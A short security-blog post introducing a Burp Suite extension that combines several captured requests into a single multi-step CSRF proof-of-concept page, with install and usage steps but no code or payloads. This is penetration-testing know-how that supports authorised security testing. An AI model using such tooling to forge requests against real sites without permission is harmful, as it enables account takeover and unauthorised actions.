dom. Dic 8th, 2019


KelvinSecurity – News – Cyber Security News – ETHICAL HACKINg – Pentesting – OSINT

Burp extension to generate multi-step CSRF POC

2 min read

Ever wanted to combine the individual CSRF POCs in Burp into a single HTML? Or ever wished that Burp generated CSRF POCs combining two or more requests? Look no further!

Multi-step CSRF POC extension for Burp combines two or more requests into a single HTML POC. This extension also gives you an option to generate the multi-step POC using form-based, XHR or jQuery based HTML.

Getting Started

Installing the extension

  • Download Jython standalone JAR into a directory.
  • Select this directory in Burp suite’s “Java Environment” which can be reached from “Extender” -> “Options”.
  • Download the latest release from releases and load it into Burp by going to “Extender” -> “Extensions” -> click “Add” and select the downloaded extension JAR file.

Using the extension

Generating a new multi-step CSRF POC

  • Once loaded, select a few requests in Burp’s “HTTP history” tab.
  • Right-click and select “Multi-Step CSRF POC” -> “Generate new Multi-Step CSRF POC”.

Adding to existing CSRF POC

  • Make sure an existing Multi-step CSRF POC window is open.
  • Select one or more requests in Burp’s “HTTP history” tab.
  • Right-click and select “Multi-Step CSRF POC” -> “Add to existing POC” and select the POC window to which the new request(s) need to be added to.

Other Features

The extension supports,

  • reordering the requests in CSRF POC window.
  • modifying the requests in the Multi-step CSRF POC window and regenerating HTML.
  • removing added requests.
  • copying the generated HTML code to clipboard.
  • exceptions are displayed in the bottom most text area while stack trace for the exceptions are displayed in the “Errors” tab for the extension.

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

seis − 4 =

Copyright © All rights reserved. | Newsphere by AF themes.